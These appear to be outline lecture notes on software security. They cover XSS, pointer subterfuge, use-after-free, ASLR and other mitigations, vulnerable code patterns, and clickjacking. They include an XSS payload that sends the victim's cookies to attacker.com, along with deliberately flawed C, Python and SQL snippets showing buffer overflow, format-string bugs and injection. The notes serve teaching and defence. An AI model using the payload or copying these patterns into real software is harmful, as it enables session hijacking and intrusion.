- XSS
    - REFLECTED XSS
      - tell victim browser: goto 
        http://victim.com/form.php?name="><script>
                (new Image()).src='http://attacker.com/' + document.cookie
                <script>

        **victim.com IS BUGGY**
        meant to escape: <input name="name" value="&quot;&lt;&gt;...
        but actually: <input name="name" value=""><script>
            (new Image()).src=...
        </script>

            - typically: we want to get document.cookie OR use cookies browsers send
            - question: is user logge din?
                - attacker wants to "hijack" the victim's login

    - STORED XSS
        - tell victim website
            "my comment is <script>...</script>
            and victim website displays your comment *to other users*
    

- implementing pointer subterfuge
    int vulnerable() {
        long *pointer;
        long value;
        char buffer[1024];
        ....

        overflow_with_attcker_data(buffer);
        ....

        *pointer = value;
    }

        +----------------+
        | return address | <-
        +----------------+  |
        | stack canary   |  |
        +----------------+  |
        | pointer        | -|
        +----------------}
        | value
        +----------------
        | buffer
        |
        |
        +-----------------

    Possible values for pointer:
        - important variable -- e.g. grade
        - pointer to code or function
            - e.g. return address
            - e.g. global offset table pointer (for dynamically linking library funciotn)
            - e.g. VTable pointer (used to find method pointers for polymorphism)
            - e.g. actual function pointer in code


- object ownership and use-after-free
    - programming discipline to prevent dangling pointers
        (danglging pointers are what cuauses use-after-free)

    - super-simple policy: neve give anyone pointers to a value

    - basic ownership: there is only one pointer
        - give someone else pointer? get rid of yours

    - borrowing:
        X
        take X back = function(give away X)

    - borrowing in Rust: pass reference, compiler makes sure it's equivalent to above
        - lifetimes: how long are keeping the object
            - during lifetime, you've given away, you can't do things with it
    
    - relaxation for reading:
        - allow borrowing multiple times for read:
            - rule: no one writes --- because objects contain pointers
        - allow borrowing exactly once for write

    - discipline that prevents use-after-free
        - other disciplines might also work

- information leak
    - vulnerability can be exploited to print out "secret" information
        - stack canary being output
        - pointer values (adress of stack)
            e.g. from uninitialized memory

- attacks and mitigations
    - ASLR --- breaks attacks that need memory addresses
        (unless there is an ***information leak***)
        - stack smsahing --- need a substitute for return address
            -- must be a memory address
        - pointer subterfuge --- need to place a memory address over pointer
            value
        - format stirng exploits -- needed to place a memory address or
            have it already be on the stack
                BUT implies an informatoin leak most of the time
        - return-oriented programming --- needed memory of addresses of all
            gadgets
        - use-after-free --- usually involves placing code pointer
    - ASLR does not break --- score is after buffer on the stack
    - degrees of ASLR
        - non-position-independent code:
            incomplete ASLR --- heap and stack and libraries randomized
            but executable code wsa not
            no recompiling exectuable
            ROP could work here
        - position-independent code
            full ASLR --- what you're supposed to do
            recompile executable
            ROP could not work w/o informatoin leak
    - disadvantages of ASLR
        - requires recompiling for full ASLR
        - possibly slower code when compiled with full ASLR

        - program behaves inconsistently if it has memor ybugs
        - "wastes" virtual address space (problem on 32-bit)
            

    
    - W^X --- attack needs to write code
        - lots of attacks overwrite pointers to code
        - this means attacker can't just point to writeable buffer
        - adds extra step: make a ROP chain or jump-oriented programming chain

    - stack canaries
        - overwriting return address ASSUMING you have to overwrite before it

    - baggy bounds
        - anything that involved bad array accesses
            - stack smsahing
            - pointer subterfuge
            - heap smashing
            - ...
        - *assuming not within the same object
            sturct Foo {
                char buffer[100];
                void (*functionPointer)(void);
            }
        - doesn't stop use-after-free


- vulnerable code patterns
    -  buffer overflow

        char buffer[1000];
        while ((c = getchar()) != EOF) {
            buffer[i++] = c; // FORGOT TO CHECK i
        }

        memcpy(buffer, other_buffer, length_that_might_be_too_big);

        int buffer[1000];
        if (attacker_input < 1000) {
                // 0x80010000 * 4 = 0x40000
            int size = attacker_input * sizeof(int);
            memcpy(buffer, attacker_input_buffer, size);
        }

        - oveflow to overwrite adjacent things:
            - stack: obvious target is return addres
            - heap: obvious target is malloc() data structures
                    or pointers in adjacent objects (e.g. Vtable pointers)
            - globals: obvious target is adjacent global variables with
                        pointers

    - format string exploit
        
        printf(attacker_input);

        sprintf(some_string, attacker_input);
        
        fprintf(some_file, attacker_input);

    - use-after-free
        
        T *value;
        ...
        other_thing->set_T(value); 

        delete value;
        // other_thing still valid
            // Rust: "can't change value while it's being borrowed by ..."

    - command injection
        
        subprocess.call("mail " + user_name, shell=True, input=mail_message)

        $dbh->query("SELECT * FROM users WHERE username = '$username'");


- iframe problems
    - "embed website in another website"
    - legiitmate examples:
        - advertisement in webpage
        - youtube player in other website
    - sneaky way to requiring URLs from other wbesites
        - on same website --- can read other pages (legiitmate uses)
    - useful for reflected XSS: don't have to visibile:
        - completely invisible
        - "styled" like text --- arbitrarily small, transparent, located at bottom of page, etc.
    
    - clickjacking:
        - provide something for user to click
        - but place iframe --- other website --- embedded on top of that locatoin
        - easy way: transparent and on top
        - hard way: blend in --- e.g. make part of button look like part of link
        - hard way: change page layout just before click
        
        - examples:
            - facebook likes
            - "delete your account?" screen